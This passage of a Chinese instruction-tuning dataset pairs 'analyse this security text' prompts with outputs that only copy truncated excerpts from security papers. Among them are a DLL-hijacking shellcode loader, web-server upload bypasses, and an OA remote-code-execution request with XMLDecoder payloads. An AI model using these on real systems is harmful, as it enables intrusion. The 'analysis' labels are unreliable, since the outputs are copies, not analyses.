如xx.php.owf.rar由于Apache无法解析rar和owf后缀但能够解析php后缀因此Apache会将xx.php.owf.rar当做php格式的文件进行解析并执行 访问以下网址服务器将把xx.php.owf.rar文件当做php解析并执行 `http://www.xxx.com/xx.php.owf.rar` 假设图片文件上传的校验逻辑是 先 explode by `.` 取文件后缀成一个数组取最后一个 即 jpg, 通过后缀校验默认不能上传 php 后缀的文件接着调用 move_uploaded_file 进行文件上传这样我们访问 `www.test.ichunqiu/index.php.jpg` 就能执行我们的php 代码对此 可以在 apache conf 里面写上 `<Files ~ \"\\.(p|P)(h|H)(p|P).\"> deny from all <Files>` 这样就禁止访问 非 php 后缀的文件但还是有办法绕过`index.php%00.jpg`, 通过后缀判断后 php 5.3 版本以下的 move_uploaded_file 函数会把 %00 后面的截断保存在服务器路径下的文件名是 index.php ### CVE-2013-4547 Nginx解析漏洞 访问以下网址服务器将把xx.jpg文件当做php解析并执行 `http://www.xxx.com/xx.jpg非编码空格\\0.php` `http://127.0.0.1/a.jpg(非编码空格)\\0.php` 当我们这样请求的时候最终导致nginx认为此次请求的后缀名为php通过配置会传给fastcgi进行处理而fastcgi在查找文件的时候被\\0截断最终取到\"a.jpg(非编码空格)\"文件注Linux下php-fpm默认限制的后缀名为php如未取消限制访问将出现access denied测试想要查看执行结果需修改php-fpm.conf中的security.limit_extensions为空即允许任意后缀名文件作为php解析 常规利用中如果想触发代码执行条件为可上传带空格的文件到服务器并且服务器存储的时候也需要保留空格而大多数情况下web应用在处理上传文件时都会将文件重命名通过应用自身添加后缀或者对后缀名去掉特殊字符后做类型判断故在 linux 环境时是比较鸡肋的漏洞但根据windows读取文件时的特点即文件系统api创建文件名或查找文件名时默认会去掉文件名后的空格再执行操作此时我", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n用Golang编写 dll劫持的一些坑 (3) 源于知识星球的一个想法利用一些已知的dll劫持的程序作为\"模板\",自动生成白加黑的程序 我想用Golang编写劫持的dll这样也方便可以做成在线平台 我们的目标不是让它弹一个信息框而是让它执行shellcode并且使用一些hook技术保证白程序只加 载一个dll的同时不和后续的代码冲突 这需要我们编写一个通用的dll白加黑的劫持模板当然dll加载模 式不同劫持的方式也不同 我找到是vscode它的更新程序也有它官方的签名 被劫持的dll在 inno_updater.exe 的导入表中这种劫持可以叫它 pre-load 我只用实现它的5个函数 就可以了 因为我想做成通用型的对于这种输入表导入的dll做劫持只需要在 DllMain 中获取主程序的入口点 然后将shellcode写入入口点之后主程序运行就会执行我们的shellcode了 C代码如下 测试过是能够正常使用的 但是把它转成Go的过程中踩了不少坑 C代码转换为Go int WINAPI DllMain(HINSTANCE hInstance, DWORD fdwReason, PVOID pvReserved) { switch (fdwReason) { case DLL_PROCESS_ATTACH: hello_func(); break; case DLL_PROCESS_DETACH: break; } return TRUE; } void hello_func() DWORD baseAddress = (DWORD)GetModuleHandleA(NULL); PIMAGE_DOS_HEADER dosHeader = (PIMAGE_DOS_HEADER)baseAddress; PIMAGE_NT_HEADERS32 ntHeader = (PIMAGE_NT_HEADERS32)(baseAddress + dosHeader->e_lfanew); DWORD entryPoint = (DWORD)baseAddress + ntHeader- >OptionalHeader.AddressOfEntryPoint; DWORD old; VirtualProtect(entryPoint, size, 0x40, &old); for(int i=0;i<size;i++){ *((PBYTE)entryPoint+i) = shellcode[i]; } VirtualProtect(entryPoint, size, old, &old);  读取PE入口点用来写shellcode用Windows API GetModuleHandle 可以得到PE进程的内存地址根 据内存地址加减偏移就可以得到入口点 我原本使用了 github.com/Binject/debug/pe 库它里面有一个 pe.NewFileFromMemory() 函数可 以直接从内存中读取但是它的参数是需要一个 io 类型文件的io自身有很多api但是对内存的io 资料好少 最后找了很多资料发现只能自己实现io的接口 但问题来了 ReadAt 接口要求我们自己读完了就返回 io.EOF 我是从内存空间读的我不知道什么时 候读完 就这么纠结了好久虽然现在写的时候想到了我可以实现这个 ReadAt 长度我可以生成模板的时候 硬写进去但又感觉没必要因为我根据PE的偏移写好了 直接就不用它的库了手动根据偏移去寻找入口点 type ReaderAt interface { ReadAt(p []byte, off int64) (n int, err error) } var ( kernel32 = syscall.NewLazyDLL(\"kernel32.dll\") getModuleHandle = kernel32.NewProc(\"GetModuleHandleW\") procVirtualProtect = kernel32.NewProc(\"VirtualProtect\") ) func GetModuleHandle() (handle uintptr) { ret, _, _ := getModuleHandle.Call(0) handle = ret return } // 将shellcode写入程序ep func loader_from_ep(shellcode []byte) { baseAddress := GetModuleHandle() fmt.Println(strconv.FormatInt(int64(baseAddress), 16)) // pe读dos header ptr := un", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nPhreaking Elevators Who am I?  Car hacking things  High voltage projects  CTFs (lifetime badge winner for Cyphercon)  Infosec is a hobby ( I might be looking for a job)  I am new to the infosec world (3 years)  Car hacking things  High voltage projects  CTFs (lifetime badge winner for Cyphercon)  Infosec is a hobby ( I might be looking for a job)  I am new to the infosec world (3 years) You can not control an elevator though the phone. You can not control an elevator though the phone. Who am I not? Want to know more on elevators?  Deviant Ollam & Howard Payne - Elevator Hacking - From the Pit to the Penthouse (Watch the talk they did at HOPE) (We will have more from Deviant later on that guy is awesome.)  Deviant Ollam & Howard Payne - Elevator Hacking - From the Pit to the Penthouse (Watch the talk they did at HOPE) (We will have more from Deviant later on that guy is awesome.) Topics we are going to be covering:  Elevator phone systems basics  History (not a lot of this since its 2019 I want about things that you can do TODAY)  Information gathering  Tools I like to use  Elevator phone systems more advanced (you better be ready)  Thinking out side the elevator  Conclusion  Elevator phone systems basics  History (not a lot of this since its 2019 I want about things that you can do TODAY)  Information gathering  Tools I like to use  Elevator phone systems more advanced (you better be ready)  Thinking out side the elevator  Conclusion Legal disclaimer  I am not a lawyer please dont hack things you don't own.  All recordings were done in one party consent states or with the other parties permission.  Don't interfere with emergency communications these systems are in place for a good reason.  I am not a lawyer please dont hack things you don't own.  All recordings were done in one party consent states or with the other parties permission.  Don't interfere with emergency communications these systems are in place for a good reason. Please dont do this in the wild... Elev", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n0x00 起因 原本不想炒冷饭的有一天看到师傅们再说IDEA里面Debug获取的时候会默认调用ToString 方法然后就去google了一下相关的后反序列化知识因为提前跑路却沦落在家隔离没事可做 就多搜索了一点感觉Dubbo的三个洞还是蛮有代表性的就调试分析学习下 漏洞列表 CVE-2019-17564 CVE-2020-1948 CVE-2021-25641 0x01 Dubbo介绍 Apache Dubbo 是一款高性能Java RPC框架漏洞存在于 Apache Dubbo默认使用的反序列 化工具 hessian 中攻击者可能会通过发送恶意 RPC 请求来触发漏洞这类 RPC 请求中通常 会带有无法识别的服务名或方法名以及一些恶意的参数负载当恶意参数被反序列化时达 到代码执行的目的 使用Dubbo的最常见方法是在Spring框架中运行 dubbo 支持多种序列化方式并且序列化是和协议相对应的比如dubbo 协议的 dubbo hessian2javacompactedjavarmi 协议缺省为 java以及 http 协议的 json 等 dubbo 序列化阿里尚未开发成熟的高效 java 序列化实现阿里不建议在生产环境 使用它 hessian2 序列化hessian 是一种跨语言的高效二进制序列化方式但这里实际不 是原生的 hessian2 序列化而是阿里修改过的 hessian lite它是 dubbo RPC 默认启 用的序列化方式 json 序列化目前有两种实现一种是采用的阿里的 fastjson 库另一种是采用 dubbo 中自己实现的简单 json 库但其实现都不是特别成熟而且 json 这种文本序列 化性能一般不如上面两种二进制序列化 java 序列化主要是采用 JDK 自带的 Java 序列化实现性能很不理想 这四种主要序列化方式的性能从上到下依次递减对于 dubbo RPC 这种追求高性能的远程调用 方式来说实际上只有 12 两种高效序列化方式比较般配而第 1 个 dubbo 序列化由于还 不成熟所以实际只剩下 2 可用所以 dubbo RPC 默认采用 hessian2 序列化 但 hessian 是一个比较老的序列化实现了而且它是跨语言的所以不是单独针对 java 进行 优化的而 dubbo RPC 实际上完全是一种 Java to Java 的远程调用其实没有必要采用跨语 言的序列化方式当然肯定也不排斥跨语言的序列化 0x02 Dubbo环境搭建 这里就用的网上的师傅的了当然你要是只想复现的话P牛vulhub里面也有现成的环境 ZooKeeper 下载地址https://zookeeper.apache.org/releases.html 配置 conf目录下提供了配置的样例zoo_sample.cfg要将zk运行起来需要将其名称修改为 zoo.cfg记得提前创建下data和Log的文件夹 1 tickTime=2000 2 initLimit=10 3 syncLimit=5 4 dataDir=C:\\\\Users\\\\xxx\\\\Desktop\\\\zookeeper3.4.14\\\\conf\\\\data 5 dataLogDir=C:\\\\Users\\\\xxx\\\\Desktop\\\\zookeeper3.4.14\\\\conf\\\\log 6 clientPort=2181 然后启动bin目录下的文件就ok了下面是windows成功的图 Dubbo项目 这里推荐使用奶思师傅的模板奶思师傅的文章是真的清晰师傅们可以看下 https://www.anquanke.com/post/id/263274 0x03 CVE-2019-17564 Apache dubbo HTTP协议反序列化漏洞分析 0x03-0 漏洞介绍 本次问题出现在dubbo开启http协议后会将消费者提交的request请求在无安全校验的 情况下直接交给了spring-web.jar进行处理最终request.getInputStream()被反序列化,故存 在反序列化漏洞 0x03-1 影响范围 2.7.0 <= Apache Dubbo <= 2.7.4 2.6.0 <= Apache Dubbo <= 2.6.7 Apache Dubbo = 2.5.x 0x03-2 漏洞知识点 1.基本的一些链子知识这个漏洞用到的相对较少 0x03-3 漏洞调试 这里的断点参考了很多Y4er师傅的调试第一个断点断在了 dubbo-2.7.3.jar!\\org\\apache\\dubbo\\remoting\\http\\servlet\\DispatcherServlet.class 了这里 然后后面我们跟进这个handle方法里面瞅瞅看因为我们当前是htt", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nHigh Insecurity: Locks, Lies, and Liability Marc Weber Tobias Matt Fiddler Agenda  Security Standards  Conventional and High Security  UL-437  ANSI /BHMA (A156.5-2001)  ANSI (A156.30)  LOCKS:  Bypass Methods  LIES:  Representations  Design issues  LIABILITY:  Legal issues High Security Locks and Standards  Normal vs. High Security  Facility specifications based on UL/ANSI  Protection: Forced, Covert, Key control  Protection of high value and critical targets UL-437 Attack Resistance (Door locks and Cylinders) 5 Minutes Driving 5 Minutes Pulling 5 Minutes Prying 5 Minutes Sawing 5 Minutes Drilling 5 Minutes Forcing 10 Minutes Impressioning 10 Minutes Picking Standards (ANSI/BHMA)  ANSI 156.5  Auxiliary Locks  Graded 1-3 (1=highest rating)  ANSI 156.30  High Security Cylinders  Graded A-C (A=highest rating) Standards (ANSI A156.5) Security Tests  Impact  Tension  Torque  Impact  Sawing  Pressure  Tensile In addition to the above requirements all cylinders must meet all DRILLING(5min) and PICKING(10min) requirements of UL-437 Standards (ANSI A156.30) High Security Cylinders  Key Control (ratings are cumulative)  C - Manufacturer restricted blanks  B - Blanks protected by law  A - Authorization required  Forced Entry Extensions (Above A156.5) Standards (ANSI A156.30)  Pick Resistance (Cumulative) C: Minimum of 2 Security Pins Paracentric Keyway Minimum of one bore depth designed to prevent overlifting B: Meets all levels of C plus UL-437 for pick resistance (10 min) A: Resist picking for 15 min as tested by 5 ALOA Certified Locksmiths with commercially available tools What is High Security? Standards (UL-437)  Cabinet Locks  Door Locks  Locking Cylinder  Security Containers  Two-Key Locks UL-437 Higher Security: Not High Security Tests Include: - Endurance - Attack Resistance - Corrosion - Material Strength UL-437 Attack Resistance  A product shall not open or be compromised as a result of application of the tools and methods described  Common hand tools  Hand or portab", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# 第2章 发球前红队侦察 > 译者[@Snowming](https://github.com/Snowming04) ![](../images/chapter_2/2-1.PNG) 在 The Hacking Playbook 2 中前面的发球部分重点介绍了一些不同的工具如 Recon-NGDiscoverSpiderfootGitrobMasscanSpartaHTTP Screenshot漏洞扫描器包括 nessusopenvasBurp 套件等这些工具我们可以在外网或内网络使用对目标的基础设施进行侦察或扫描在本书中我们将延续这一做法然后从红队的角度对侦察阶段进行拓展 ## 环境探测 对于红队来说这往往是进攻的好时机你不仅需要随时准备好去攻击基础设施还需要不断地寻找它的漏洞我们可以通过使用不同的工具来进行环境扫描服务探测检索云计算配置错误这些活动有助于你收集有关目标基础设施的更多信息并找到攻击的最好方法 ### 扫描结果差异化分析 对于所有客户机我们要做的第一件事就是设置不同的监视脚本这些通常只是一些能快速完成的 bash 脚本它们每天通过电子邮件向我们发送客户机网络的差异当然在扫描之前确保你有适当合法的授权来执行扫描 对于一般不太大的客户机网络我们设置简单的 cronjob 来执行外部端口差异化分析例如我们可以创建一个快速的 Linux bash 脚本来完成这项艰巨的工作请记住替换下面脚本中的 IP 范围: - #!/bin/bash - mkdir /opt/nmap_diff - d=$(date +%Y-%m-%d) - y=$(date -d yesterday +%Y-%m-%d) - /usr/bin/nmap -T4 -oX /opt/nmap_diff/scan_$d.xml 10.100.100.0/24 ><br> /dev/null 2>&1 - if [ -e /opt/nmap_diff/scan_$y.xml ]; then - /usr/bin/ndiff /opt/nmap_diff/scan_$y.xml /opt/nmap_diff/scan_$d.xml ><br> /opt/nmap_diff/diff.txt - fi > 译者注上面这段脚本中使用了正则表达式所以本小节的英文名字叫 Regular Nmap Diffing 这是一个非常简单的脚本它每天用默认的端口运行 nmap然后使用 ndiff 比较结果然后我们可以获取这个脚本的输出结果并让它把每天发现的新端口及时通知我们的团队<br> <img src=\"../images/chapter_2/2-2.PNG\" width = \"500\" height = \"200\" alt=\"图片名称\" align=center /> 在上一本书中我们着重讨论了 [Masscan](https://github.com/robertdavidgraham/masscan) 的好处以及它比 nmap 的速度快多少Masscan 的开发者说如果你的网络带宽足够大你可以在6分钟内扫描完毕整个互联网所以说当扫描大的范围时Masscan 是很可靠的Masscan 对我们最初的侦察很有用但通常不用于比较差异 **实验**:<br> 本书中的实验是选修的在某些部分中我添加了一些实验方便你进行测试或者扩展更多的领域这都是基于读者的个人兴趣的如果对某方面感兴趣我强烈推荐你花时间改进我们的工具并与社区共享它<br> 建立一个更好的网络 diff 扫描器: - 构建一个比默认的 nmap 更好的端口列表(例如nmap 默认的漏掉一些端口比如 Redis 6379/6380 和其他端口) - 实现 nmap banner - 保持对端口的历史跟踪 - 建立电子邮件提醒/通知系统 - 参考 [diff Slack 警报](http://bit.ly/2H1o5AW) ### Web 应用程序监控 除了定期扫描开放的端口和服务之外红队还应该监视不同的 Web 应用程序这一点很重要我们可以使用以下两个工具来帮助监视应用程序的变化 我们常用的第一个工具是 [HTTPScreenshot](https://github.com/breenmachine/httpscreenshot) HTTPScreenshot 很强大的原因是它使用 Masscan 快速扫描大型网络并使用 phantomjs 捕捉它检测到的任何网站的屏幕截图这是快速获得大的内网或外网布局架构的一个好方法 请记住本书中的所有工具都是在上一版改进的 Kali 虚拟机中运行的你可以在[这里](https://securepla.net/training/)找到虚拟机 用户名密码是默认的root/toor", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n某凌OA前台条件RCE(组合利) 这个其实就是前段时间两个漏洞的结合 1.SSRF这应该叫件包含 2.XmlDecoder反序列化 之前写了个读取密码到后台JNDI的利式 这个法也不是百分百可后在塔王的提醒下发现了种更为简洁的式 看有师傅在打了就放出来了 其实主要还是在于 <c:import> 这个标签的特性 之前也有详细介绍过 <c:import> 标签提供了所有 < jsp:include > 为标签所具有的功能同时也允许包 含绝对 URL 举例来说使 <c:import> 标签可以包含个 FTP 服务器中不同的内容 既然提供了include的所有功能那么也可以直接去包含某些带有漏洞的路径如 Xmldecoder反序列化的地址: /sys/search/sys_search_main/sysSearchMain.do?method=editParam 可以利 <c:import> 标签进包含绕过权限验证 POC POST /sys/ui/extend/varkind/custom.jsp HTTP/1.1 Host: Host Accept: text/html,application/xhtml Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-cn Accept-Encoding: gzip, deflate Origin: null Connection: close Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded Content-Length: 2753 var={\"body\":{\"file\":\"/sys/search/sys_search_main/sysSearchMain.do? method=editParam\"}}&fdParemNames=11&fdParameters=<payload> 由于此OA使的是集成环境JDK版本为1.7.在请教清师傅后可以利  com.sun.org.apache.bcel.internal.util.ClassLoader 去加载恶意类 POC: <java> <void+class%3d\"com.sun.org.apache.bcel.internal.util.ClassLoader\"> <void+method%3d\"loadClass\"><string></string> <void+method%3d\"newInstance\"></void></void></void></java> 也可以像我这种jb样去调bsh因为该系统带了bsh POC: <java><void class=\"bsh.Interpreter\"><void method=\"eval\"><string> Java Code </string> </void></void></java> 感谢塔王和清川崎师傅的指点", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nMicroservices and FaaS for Offensive Security Ryan Baxendale $ whoami Ryan Baxendale Penetration Tester Centurion Information Security Pte Ltd - www.centurioninfosec.sg Singapore twitter.com/ryancancomputer github.com/ryanbaxendale linkedin.com/in/ryanbaxendale AWS Lambda Jan 2015 - AWS Lambda Preview Open to all AWS Customers Upload your code and trigger it to run Scales quickly 1,000,000 code runs for free every month Only supported node.js lambdash: AWS Lambda Shell Hack By Eric Hammond https://github.com/alestic/lambdash Run shell commands using node.js Servers are dead... Serverless The stack Source: https://intl.aliyun.com/forum/read-499 Microservices Code Real-time File Processing https://aws.amazon.com/lambda/ Scale https://github.com/airbnb/streamalert StreamAlert is a serverless, realtime data analysis framework which empowers you to ingest, analyze, and alert on data from any environment, using datasources and alerting logic you define. https://github.com/0x4D31/honeyLambda honeyλ - a simple serverless application designed to create and monitor URL {honey}tokens, on top of AWS Lambda and Amazon API Gateway https://github.com/goadapp/goad Goad is an AWS Lambda powered, highly distributed, load testing tool built in Go https://github.com/davbo/lambda-csp-report-uri Simple python application which runs on AWS Lambda and writes CSP reports into S3 for later processing https://github.com/therefromhere/csp_lambda AWS Lambda function to store Content Security Policy reports in ElasticSearch Automate https://github.com/marekq/aws-lambda-firewall Create temporary security groups on your EC2 instances through a simple API call. In addition, audit your security groups easily by the use of automated reports written to S3. https://github.com/ilijamt/lambda_security_grou p_manager Auto managing your AWS security groups with Lambda https://github.com/johnmccuk/cloudflare-ip-security- group-update Lambda function to retrieve Cloudflare's IP address list and update the sp", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nbc === 算术操作精密运算工具 ## 补充说明 **bc命令** 是一种支持任意精度的交互执行的计算器语言bash内置了对整数四则运算的支持但是并不支持浮点运算而bc命令可以很方便的进行浮点运算当然整数运算也不再话下 ### 语法 ```shell bc(选项)(参数) ``` ### 选项 ```shell -i强制进入交互式模式 -l定义使用的标准数学库 -w对POSIX bc的扩展给出警告信息 -q不打印正常的GNU bc环境信息 -v显示指令版本信息 -h显示指令的帮助信息 ``` ### 参数 文件指定包含计算任务的文件 ### 实例 算术操作高级运算bc命令它可以执行浮点运算和一些高级函数 ```shell echo \"1.212*3\" | bc 3.636 ``` 设定小数精度数值范围 ```shell echo \"scale=2;3/8\" | bc 0.37 ``` 参数`scale=2`是将bc输出结果的小数位设置为2位 进制转换 ```shell #!/bin/bash abc=192 echo \"obase=2;$abc\" | bc ``` 执行结果为11000000这是用bc将十进制转换成二进制 ```shell #!/bin/bash abc=11000000 echo \"obase=10;ibase=2;$abc\" | bc ``` 执行结果为192这是用bc将二进制转换为十进制 计算平方和平方根 ```shell echo \"1010\" | bc echo \"sqrt(100)\" | bc ```", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n--- title: Sublime Text date: 2022-11-23 16:23:31.695666 background: bg-[#e8973e] label: tags: - - categories: - Keyboard Shortcuts intro: | A visual cheat-sheet for the 49 keyboard shortcuts found in Sublime Text --- Keyboard Shortcuts ------------------ ### Editing {.row-span-3} Shortcut | Action ---|--- `Ctrl` `X` | Cut line `Ctrl` `Enter` | Insert line after `Ctrl` `Shift` `Enter` | Insert line before `Ctrl` `Shift` `Up` | Move line/selection up `Ctrl` `Shift` `Down` | Move line/selection down `Ctrl` `L` | Select line - Repeat to select next lines `Ctrl` `D` | Select word - Repeat selects other occurrences `Ctrl` `M` | Jump to closing parentheses - Repeat to jump to opening parentheses `Ctrl` `Shift` `M` | Select all contents of the current parentheses `Ctrl` `Shift` `K` | Delete line `Ctrl` `K, K` | Delete from cursor to end of line `Ctrl` `K` `Backspace` | Delete from cursor to start of line `Ctrl` `]` | Indent current line(s) `Ctrl` `[` | Un-indent current line(s) `Ctrl` `Shift` `D` | Duplicate line(s) `Ctrl` `J` | Join line below to the end of the current line `Ctrl` `/` | Comment/un-comment current line `Ctrl` `Shift` `/` | Block comment current selection `Ctrl` `Y` | Redo, or repeat last keyboard shortcut command `Ctrl` `Shift` `V` | Paste and indent correctly `Ctrl` `Space` | Select next auto-complete suggestion `Ctrl` `U` | Soft undo; jumps to your last change before undoing, change when repeated `Alt` `Shift` `W` | Wrap selection in HTML tag `Alt` `.` | Close current HTML tag `Alt` `Q` | Hard wrap line to ruler column setting {.shortcuts} ### Navigation Shortcut | Action ---|--- `Ctrl` `P` | Quick-open files by name `Ctrl` `R` | Goto symbol `Ctrl` `;` | Goto word in current file `Ctrl` `G` | Goto line in current file {.shortcuts} ### General Shortcut | Action ---|--- `Ctrl` `Shift` `P` | Command prompt `Ctrl` `K, B` | Toggle sidebar `Ctrl` `Shift` `Alt` `P` | Show scope in status bar {.shortcuts} ### Find/Replace Shortcut | Action ---|--- `Ctrl` `F` | F", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n那些年年的密碼學後門 講者 : OAlienO 目錄 1. Cryptographic Backdoor  重要性  種類 2. Dual EC Backdoor  介紹  隨機數很重要嗎?  後門原理理  故事時間 3. Diffie Hellman Backdoor  複習時間  Everybody Backdoor  Nobody-But-Us Backdoor 4. Conclusion Cryptographic Backdoor Cryptographic Backdoor - 重要性 網路路通訊十分依賴密碼系統 各國都想要 監聽網路路通訊 密碼學後門 Cryptographic Backdoor - 種類 Everybody Backdoors : 所有人都可以進來來的後門與其說後門不如說是故意設置的漏洞洞 Nobody-But-Us ( NOBUS ) Backdoors 只有擁有金金鑰的人才能用的後門真正的後門 Dual EC Backdoor Dual EC - 介紹 Dual EC 是一個偽隨機數產生器 ( pseudorandom number generator ) 剛公布 Dual EC 的時候他就有許多問題 1. 比其他的 PRNG 慢 2. 產生的隨機數沒有那麼隨機 ( biased ) 3. 可能有後門存在這個 PRNG Dual EC - 隨機數很重要嗎 ? 1. DSA - private key 2. AES - iv, key 3. RSA - p, q 4.  許多的密碼系統都需要隨機數 當我們能預測這些隨機數差不多就等同於我們可以破解他 Dual EC - 後門原理理 https://projectbullrun.org/dual-ec/documents/dual-ec-20150731.pdf Dual EC 有兩兩個版本 : Dual EC 2006 Dual EC 2007 Dual EC - 後門原理理 https://projectbullrun.org/dual-ec/documents/dual-ec-20150731.pdf Dual EC 2006 Dual EC - 後門原理理 https://projectbullrun.org/dual-ec/documents/dual-ec-20150731.pdf 256 bits 整數 P, Q 是在 Elliptic Curve 上的點 丟掉 16 bits 輸出 不可逆函式 Dual EC - 後門原理理 https://projectbullrun.org/dual-ec/documents/dual-ec-20150731.pdf 橢圓曲線 ( Elliptic Curve ) ? 就是滿足下面方程式的一堆點 在密碼學我們是用這個 有了了一堆點形成的集合 再定義一個加法運算 我們就得到了了一個群 Dual EC - 後門原理理 https://projectbullrun.org/dual-ec/documents/dual-ec-20150731.pdf 兩兩個在 Elliptic Curve 上的點怎麼加法 ? 切線交點對 x 軸鏡射 A B + = C Dual EC - 後門原理理 https://projectbullrun.org/dual-ec/documents/dual-ec-20150731.pdf 我們的不可逆函式就是一個 ECDLP ( Elliptic Curve Discrete Logarithm Problem ) 這是個非常難的問題所以可以把他當作不可逆函式 就是 這個點的 x 座標 Dual EC - 後門原理理 https://projectbullrun.org/dual-ec/documents/dual-ec-20150731.pdf 有了了不可逆函式 我們沒辦法從輸出 r 反推內部狀狀態 s 也就沒辦法從內部狀狀態 s 往下預測接下來來的輸出 Dual EC - 後門原理理 https://projectbullrun.org/dual-ec/documents/dual-ec-20150731.pdf It sounds perfect What could possibly go wrong ? Dual EC - 後門原理理 https://projectbullrun.org/dual-ec/documents/dual-ec-20150731.pdf 如果攻擊者知道 使得 那丟掉的 16 bits 怎麼辦 ? 直接暴暴力力嘗試 Dual EC - 後門原理理 https://projectbullrun.org/dual-ec/documents/dual", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n(Un) Fucking Forensics0 Ac#ve/Passive+memory+hacking/debugging+ + K2+/+Director+@IOACTIVE+ hBps://github.com/K2+ + About me?0  Hacker+for+a+while+  inVtero.net++  Memory+analysis+framework+for+Windows++  Super+fast/GBPS+throughput+  Memory+integrity+checking+of+VMs/CrashDumps/Memory++  Type+aware+memory+hacking+tool++  EhTrace+  Binary+trace+tool+  Uses+hook/patch-less+technique+for+in-process+debugging++  Lots+of+other+stuff+ Outline / areas0  How+to+forensic,+how+to+Fuck+forensics+and+how+to+un+fuck+it.+  Intx80+AF+technique+on+header+wipe/non-resident+code/trim()++  How+to+deal+with+that+ +  RoP+background,+how+its+used+in+aBacks+  Gargoyle+aBacks+&+how+to+protect+against+them+ +  CloudLeech++twist+on+UlfFrisk+DMA+aBacks+/+PCILeech+  Demo+of+open+source+memory+integrity+pla_orm+for+Windows!+ Can you even forensic?0  In+general:++Determine+what+happened.++ Make+a+!meline+of+known+events.+  Ar!facts+disk+&+memory+(ocen+incomplete/ fragmented)+used+to+build+#meline.+  How+good+can+we+do?++How+do+we+know+if+were+ done?++ Ar>fact sources How aAestable are they? 0  Time+stamps+from+all+sources+to+derive+!meline+ (event+logs/syslog/firewall/filesystem+#me,+etc)+  Wevtu!l+-+Windows+Events+Command+Line+U#lity.++ Configure+more+than+1189+event+log+sources+  SysMon+(from+SysInternals/Mark+Russinovich)+/+neat+ config:+ hBps://github.com/SwicOnSecurity/sysmon-config+  Linux+(osquery+ hBps://github.com/facebook/osquery+)++ + Handling memory0  Forensics+meets+Reverse+Engineering+  Dump+/+disassemble+determine+what+the+extent2of2capability2the2a8acker2possesses2  I+want+to+at+least+clear2this2guy2out2&+find+out+how2much2damage2he+did+  Vola#lity/Rekall+python+forensic+engines++  Stephen+Ridleys+RE+memory+hacking+tool:++hBps://github.com/s7ephen/SandKit++  Paper:+Escaping+the+sandbox+  GAME+HACKING!+J+  Lets+look+at+what+people+do+to+cheat+some#me?+ How to Fit? 0  Hide+really+well+  Wipe/Destroy+logging/leave+no+ trace/Stenography/Encrypt+  Misdirect+  Flood/Annoy/Make+analysis+so+ cost", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nGo NULL yourself :or How I Learned to Start Worrying While Getting Fined for Others Auto Infractions Introduction  whoami  Im called droogie.  Im a degenerate.  I hack things for IOActive. Introduction  Why this talk?  Discussions of old famous hacker tales  Fake stories, lulz  Victims of computer bugs  Real situations from unexpected data  Are these scenarios realistic in today's tech environment?  Could someone exploit one of these scenarios for profit/lulz? Observations 5 License Plate Cameras License Plate Cameras  SQL Injection  Inject via query in license plate  Skepticism  Clearly a joke/wouldnt work  Brings up some good points though License Plate Cameras  Palantir  Big Data Analytics  Surveillance Network Internal Manual https://www.vice.com/en_us/article/9kx4z8/revealed-this-is-palantirs-top-secret- user-manual-for-cops Different CA privacy laws https://www.eff.org/pages/california-automated-license-plate-reader-policies 8 License Plate Cameras FOIA  Freedom of Information Act  Provides the public the right to request access to records from any federal agency  There are a nine exemptions which could block you from obtaining data  They will not give you something they dont already have  Ask for electronic delivery  $0.10 per page, $1 per CD rom  https://www.foia.gov/ License Plate Cameras  Seattle PD ALPR Database  Contains all captured plate data for Seattle area  OCR/Images/Location Details  Interesting Data/Anomalies  Some sensitive info scrubbed, but not all ;) 11 License Plate Cameras Mr. NULL  Null surname breaking computer systems  Trouble purchasing plane tickets  Skepticism?  Is this a one-off issue in a specific scenario or a global issue?  Would something like this cause a bug today?  How did this even cause an issue?  NULL != NULL, Business logic issues? http://www.bbc.com/future/story/20160325-the-names-that-break-computer-systems My crime is that of curiosity My prediction  I believe Mr. Null  Edge cases likely still exist  Data validation is ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nMarina Simakov Yaron Zinar ABOUT US <RELAYING CREDENTIALS HAS NEVER BEEN EASIER. MARINA SIMAKOV & YARON ZINAR. DEFCON 2019>  Senior Security Researcher @Preempt  M.Sc. in computer science, with several published articles, with a main area of expertise in graph theory  Previously worked as a Security Researcher @Microsoft  Spoke at various security conferences such as Black Hat, Blue Hat IL and DefCon Marina Simakov (@simakov_marina)  Senior Security Researcher Lead @Preempt  M.Sc. in Computer Science with a focus on statistical analysis  Spent over 12 years at leading companies such as Google and Microsoft  Among his team latest finding are CVE-2017-8563, CVE-2018-0886, CVE-2019- 1040 and CVE-2019-1019 Yaron Zinar (@YaronZi) AGENDA 1. Introduction:  Common attacks on Active Directory  NTLM  Design weaknesses  NTLM Relay  Offered mitigations 2. Known Vulnerabilities  LDAPS Relay  CVE-2015-0005 3. New vulnerabilities  Your session key is my session key  Drop the MIC  EPA bypass  Attacking AD FS  External lockout bypass  Reverse-Kerberoasting 4. Takeaways <RELAYING CREDENTIALS HAS NEVER BEEN EASIER. MARINA SIMAKOV & YARON ZINAR. DEFCON 2019> 